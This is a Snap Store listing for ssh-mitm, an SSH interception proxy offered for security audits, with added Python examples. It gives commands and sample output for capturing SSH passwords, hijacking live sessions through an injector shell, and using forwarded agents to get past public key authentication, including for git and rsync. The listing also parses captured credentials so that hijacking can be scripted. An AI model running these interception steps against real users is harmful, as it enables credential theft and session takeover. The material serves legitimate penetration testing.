ssh-mitm

Manfred Kaiser (ssh-mitm) Publisher

Install latest/stable of ssh-mitm

Install using the command line

sudo snap install ssh-mitm

ssh mitm server for security audits

ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation

Features

  • Hijacking and logging of terminal sessions
  • Support for ssh commands (e.g. git over ssh)
  • SCP and SFTP
    • store files
    • replace files
    • inject additional files
  • Agent Forwarding
  • Port Forwarding
  • Check and test clients against known vulnerabilities
  • Plugin support

Connect to the network

To start an intercepting SSH-MITM server on port 10022 (the default listening port), run a single command, giving the real SSH server the proxy should forward to as --remote-host:

$ ssh-mitm --remote-host 192.168.0.x

Now connect a client to the ssh-mitm server (proxyserver is the host running ssh-mitm):

$ ssh -p 10022 user@proxyserver

The captured credentials appear in the log output:

 2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:
     Remote Address: 192.168.0.x
     Port: 22
     Username: user
     Password: supersecret
     Key: None
     Agent: None

Hijack SSH sessions

When a client connects, ssh-mitm starts an additional SSH server on the proxy host for that session, which is used for session hijacking:

[INFO] created injector shell on port 34463

To hijack the session, connect to that port from the proxy host with any ssh client:

$ ssh -p 34463 127.0.0.1
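The two kinds of log lines shown above (the "Client connection established" block with its credential fields, and the "created injector shell" line) are what an auditor has to work from after a run. The following is an added example, not code from this page or from the ssh-mitm project: a small parser that turns that output into structured records, pairs each session with its injector port, lists the sessions in which a password was captured, and redacts passwords for a report. The sample log is constructed to match the format shown on this page; the second session's values are invented for illustration, and a real run may print other fields or a different timestamp format, so unknown "Key: Value" lines are kept generically.

```python
import re
from typing import Dict, List, Optional

# Constructed sample, modelled on the log blocks shown on this page.
# The second session is invented to exercise the non-password path.
SAMPLE_LOG = """\
2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:
    Remote Address: 192.168.0.x
    Port: 22
    Username: user
    Password: supersecret
    Key: None
    Agent: None
2021-01-01 11:38:26,210 [INFO] created injector shell on port 34463
2021-01-01 11:40:02,001 [INFO]  Client connection established with parameters:
    Remote Address: 192.168.0.x
    Port: 22
    Username: deploy
    Password: None
    Key: ssh-ed25519 example-blob
    Agent: True
2021-01-01 11:40:02,150 [INFO] created injector shell on port 41337
"""

CONN_RE = re.compile(r"^(?P<ts>\S+ \S+) \[INFO\]\s+Client connection established")
FIELD_RE = re.compile(r"^\s+(?P<key>[A-Za-z ]+): (?P<value>.*)$")
INJECT_RE = re.compile(r"^(?P<ts>\S+ \S+) \[INFO\]\s+created injector shell on port (?P<port>\d+)")


def parse_ssh_mitm_log(text: str) -> List[Dict[str, Optional[object]]]:
    """Walk the log top to bottom; each connection block opens a new session
    record, indented 'Key: Value' lines fill it, and the next injector line
    is attached to the most recent session. 'None' becomes Python None."""
    sessions: List[Dict[str, Optional[object]]] = []
    current: Optional[Dict[str, Optional[object]]] = None
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            current = {"timestamp": m.group("ts"), "injector_port": None}
            sessions.append(current)
            continue
        m = INJECT_RE.match(line)
        if m and current is not None:
            current["injector_port"] = int(m.group("port"))
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            key = m.group("key").strip().lower().replace(" ", "_")
            value = m.group("value").strip()
            current[key] = None if value == "None" else value
    return sessions


def sessions_with_password(sessions):
    """Sessions where a plaintext password went through the proxy."""
    return [s for s in sessions if s.get("password")]


def redact(session):
    """Copy of a session record safe to paste into an audit report."""
    out = dict(session)
    if out.get("password"):
        out["password"] = "<redacted>"
    return out


if __name__ == "__main__":
    for s in parse_ssh_mitm_log(SAMPLE_LOG):
        print(redact(s))
```

Each record carries the injector port, so a script driving the hijack step can read it from the parsed record instead of from the raw log.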

Advanced usage

The SSH-MITM proxy server is capable of advanced man-in-the-middle attacks and can be used in scenarios where the remote host is not known in advance, a single remote host is not sufficient, or public key authentication is used.

Public key authentication

Public key authentication is a way of logging into an SSH/SFTP account using a cryptographic key rather than a password.

The advantage is that no confidential data is sent to the remote host, so there is nothing for a man-in-the-middle to intercept: the client only sends a signature, and the signed data includes the session identifier of the client's own connection, which is derived from the key exchange with the peer it is actually talking to.

Because of this design, the SSH-MITM proxy server cannot reuse the data provided during authentication: the signature the client produced for the client-to-proxy session is not valid for the proxy-to-server session, which has a different session identifier.

If you need to intercept a client that uses public key authentication, there are some options.

SSH supports agent forwarding, which lets a remote host use the client's ssh-agent to authenticate to another remote host.

The SSH-MITM proxy server is able to request the agent from the client and use it for the authentication to the remote host. With this feature, the SSH-MITM proxy server can perform a full man-in-the-middle attack even against public key authentication.

To use agent forwarding, start the SSH-MITM proxy server with --request-agent:

$ ssh-mitm --request-agent --remote-host 192.168.0.x

The client must be started with agent forwarding enabled. OpenSSH does not forward the agent unless the user opts in (ForwardAgent in the client configuration or -A on the command line), so this attack only works against clients that have turned it on; keys added with ssh-add -c additionally require the user to confirm each signature request, which makes an unexpected request from the proxy visible.

$ ssh -A -p 10022 user@proxyserver
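The two paragraphs above make a claim that is easy to state and worth seeing in bytes: without agent forwarding the proxy cannot reuse the client's signature, and with agent forwarding it can ask for a fresh one. The following is an added example, not code from this page or from the ssh-mitm project. It builds the exact byte string an SSH client signs for the "publickey" method (RFC 4252, section 7), whose first field is the session identifier, and runs both scenarios plus the ssh-add -c case. Assumptions, not from the page: the real signature algorithm is stood in for by an HMAC under a secret that only the toy agent holds (so verification here needs that secret, whereas a real server verifies with the public key alone); the session identifiers, user name and public key blob are constructed; the ToyAgent class and the two scenario functions are written here for illustration.

```python
import hashlib
import hmac
import struct

SSH_MSG_USERAUTH_REQUEST = 50


def ssh_string(data: bytes) -> bytes:
    """RFC 4251 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def userauth_signed_data(session_id: bytes, user: str, algo: str, pubkey_blob: bytes) -> bytes:
    """The byte string an SSH client signs for publickey auth (RFC 4252 section 7).
    The session identifier comes first, which binds the signature to one connection."""
    return (
        ssh_string(session_id)
        + bytes([SSH_MSG_USERAUTH_REQUEST])
        + ssh_string(user.encode())
        + ssh_string(b"ssh-connection")
        + ssh_string(b"publickey")
        + b"\x01"                      # boolean TRUE: a signature follows
        + ssh_string(algo.encode())
        + ssh_string(pubkey_blob)
    )


class ToyAgent:
    """Stand-in for the client's ssh-agent (assumption: HMAC instead of a real
    signature). It signs whatever it is asked to sign; with confirm=True it
    models a key added with `ssh-add -c`, where the user is prompted per request
    and is assumed to refuse a request they did not expect."""

    def __init__(self, secret: bytes, confirm: bool = False):
        self._secret = secret
        self.confirm = confirm
        self.pubkey_blob = b"toy-" + hashlib.sha256(secret).digest()  # constructed blob
        self.sign_requests = []  # what a prompting agent would show the user

    def sign(self, data: bytes):
        self.sign_requests.append(data)
        if self.confirm:
            return None  # prompt shown, user declines
        return hmac.new(self._secret, data, hashlib.sha256).digest()

    def verify(self, data: bytes, sig) -> bool:
        """Verification oracle; a real server would use only the public key."""
        if sig is None:
            return False
        expected = hmac.new(self._secret, data, hashlib.sha256).digest()
        return hmac.compare_digest(expected, sig)


# Constructed, deterministic session identifiers: one per hop, since each hop
# runs its own key exchange and the identifier is that exchange's hash.
SID_CLIENT_PROXY = hashlib.sha256(b"kex: client <-> ssh-mitm").digest()
SID_PROXY_SERVER = hashlib.sha256(b"kex: ssh-mitm <-> real server").digest()
USER, ALGO = "user", "ssh-ed25519"


def replay_attempt(agent: ToyAgent):
    """Plain publickey auth through the proxy. Returns (proxy_accepts, server_accepts)."""
    client_data = userauth_signed_data(SID_CLIENT_PROXY, USER, ALGO, agent.pubkey_blob)
    sig = agent.sign(client_data)                 # client signs for ITS session
    proxy_accepts = agent.verify(client_data, sig)
    # The proxy forwards the same signature; the real server rebuilds the signed
    # data with ITS session identifier, so the signature does not match.
    server_data = userauth_signed_data(SID_PROXY_SERVER, USER, ALGO, agent.pubkey_blob)
    server_accepts = agent.verify(server_data, sig)
    return proxy_accepts, server_accepts


def forwarded_agent_attempt(agent: ToyAgent) -> bool:
    """With `ssh -A`, the proxy hands the forwarded agent data bound to the
    proxy<->server session and gets a valid signature. Returns server_accepts."""
    server_data = userauth_signed_data(SID_PROXY_SERVER, USER, ALGO, agent.pubkey_blob)
    sig = agent.sign(server_data)
    return agent.verify(server_data, sig)


if __name__ == "__main__":
    print("no forwarding (proxy, server):", replay_attempt(ToyAgent(b"client secret")))
    print("forwarded agent:", forwarded_agent_attempt(ToyAgent(b"client secret")))
    print("forwarded agent, ssh-add -c:",
          forwarded_agent_attempt(ToyAgent(b"client secret", confirm=True)))
```

The proxy accepts the client's signature for its own session, the real server rejects that same signature, and only the forwarded agent produces one the server accepts; with a confirming agent the proxy's request shows up as a prompt the user can refuse.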

Intercept git

In most cases, when git is used over ssh, public key authentication is used. The git command itself has no option to forward the agent.

To enable agent forwarding, git has to be executed with the GIT_SSH_COMMAND environment variable, which lets you pass -A to the ssh client git invokes.

 # start the ssh server
 ssh-mitm --remote-host github.com --request-agent --scp-interface debug_traffic
 # invoke git commands
 GIT_SSH_COMMAND="ssh -A" git clone ssh://git@127.0.0.1:10022/ssh-mitm/ssh-mitm.git

Intercept rsync

When ssh-mitm is used to intercept rsync, the proxy port must be passed to rsync through its -e (remote shell) option, since rsync runs ssh itself. The agent can be forwarded the same way, if needed.

To sync a local directory with a remote directory, rsync can be executed with following parameters.

 rsync -r -e 'ssh -p 10022 -A' /local/folder/ user@127.0.0.1:/remote/folder/

Further steps

SSH-MITM has several client exploits integrated, which can be used to audit various ssh clients such as OpenSSH and PuTTY for known vulnerabilities.

Full Documentation: https://docs.ssh-mitm.at

Details for ssh-mitm

License
LGPL-3.0-or-later
Last updated
16 July 2021
